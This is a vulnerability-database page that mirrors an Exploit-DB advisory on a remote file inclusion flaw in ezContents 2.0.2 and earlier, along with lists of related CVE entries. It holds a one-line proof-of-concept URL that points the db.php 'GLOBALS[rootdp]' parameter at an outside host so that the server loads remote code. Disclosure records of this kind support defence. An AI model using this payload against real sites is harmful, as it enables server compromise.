Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbCedric CochinEDB-ID:23683
HistoryFeb 11, 2004 - 12:00 a.m.

VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion

2004-02-1100:00:00
Cedric Cochin
www.exploit-db.com
22

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9638/info

It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules. 

This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.

http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/

Related

exploitdb 1
cve 2
nvd 2
securityvulns 1
cvelist 2
prion 1
exploitdb
exploitdb
VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion
2004-02-11 00:00:00
cve
cve
CVE-2004-0132
2004-03-03 05:00:00
CVE-2008-3575
2008-08-10 20:41:00
nvd
nvd
CVE-2004-0132
2004-03-03 05:00:00
CVE-2008-3575
2008-08-10 20:41:00
securityvulns
securityvulns
PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior
2004-02-11 00:00:00
cvelist
cvelist
CVE-2004-0132
2004-02-14 05:00:00
CVE-2008-3575
2008-08-10 20:00:00
prion
prion
Remote file inclusion
2008-08-10 20:41:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23683
exploitdb1cve2nvd2securityvulns1cvelist2prion1